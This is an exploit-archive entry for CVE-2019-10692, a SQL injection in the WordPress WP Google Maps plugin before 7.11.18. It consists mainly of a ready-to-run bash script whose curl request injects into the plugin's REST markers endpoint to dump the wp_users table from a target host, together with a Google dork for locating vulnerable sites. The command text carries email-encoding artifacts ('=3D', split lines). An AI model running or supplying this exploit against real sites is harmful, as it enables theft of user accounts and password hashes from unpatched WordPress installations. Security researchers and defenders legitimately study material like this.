WordPress Rest Google Maps plugin versions prior to 7.11.18 suffer from a remote SQL injection vulnerability.
e6025006b8ce2e3cfcabeec432d9bc57bb38877f128d98224407cf302db914db
# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
# Date: 2020-09-09
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: < 7.11.18
# Tested on: Linux
# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
#!/bin/bash
TARGET="192.168.1.77"
curl -k --silent
"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
fields=3D*+from+wp_users+--+-"
| jq